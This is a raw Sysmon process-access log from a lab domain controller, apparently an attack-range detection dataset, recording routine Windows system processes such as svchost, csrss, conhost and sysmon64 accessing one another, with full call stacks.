13:41:59.254{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004953Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:41:59.254{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6a63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004952Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.208{59A5CD1D-8E46-6005-1600-00000000A301}15442108C:\Windows\system32\svchost.exe{59A5CD1D-9027-6005-1001-00000000A301}4856C:\Windows\system32\usoclient.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\usocore.dll+210d2|c:\windows\system32\usocore.dll+15924|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|
C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000004951Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.067{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9027-6005-1001-00000000A301}4856C:\Windows\system32\usoclient.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004950Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.067{59A5CD1D-9027-6005-1401-00000000A301}47764740C:\Windows\system32\conhost.exe{59A5CD1D-9027-6005-1201-00000000A301}4836C:\Windows\System32\sihclient.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004949Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.067{59A5CD1D-9027-6005-1301-00000000A301}4804864C:\Windows\system32\conhost.exe{59A5CD1D-9027-6005-1001-00000000A301}4856C:\Windows\system32\usoclient.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000004948Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.067{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004947Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.067{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004946Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:41:59.067{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004945Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.067{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004944Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:41:59.067{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004943Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.067{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004942Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:41:59.067{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004941Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.067{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004940Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:41:59.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004939Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.051{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9027-6005-1401-00000000A301}4776C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004938Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.051{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9027-6005-1201-00000000A301}4836C:\Windows\System32\sihclient.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004937Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:41:59.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004936Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004935Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:41:59.051{59A5CD1D-8E46-6005-1600-00000000A301}15442212C:\Windows\system32\svchost.exe{59A5CD1D-9027-6005-1201-00000000A301}4836C:\Windows\System32\sihclient.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a711|c:\windows\system32\UBPM.dll+f974|c:\windows\system32\UBPM.dll+cd3c|c:\windows\system32\UBPM.dll+d305|c:\windows\system32\UBPM.dll+dc05|c:\windows\system32\UBPM.dll+e91d|c:\windows\system32\UBPM.dll+e12a|c:\windows\system32\UBPM.dll+dd82|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+36c9|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b65|C:\Windows\SYSTEM32\ntdll.dll+6586d|C:\Windows\SYSTEM32\ntdll.dll+656d0|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004934Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000004933Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004932Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000004931Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004930Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:59.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004929Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:41:59.051{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004928Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 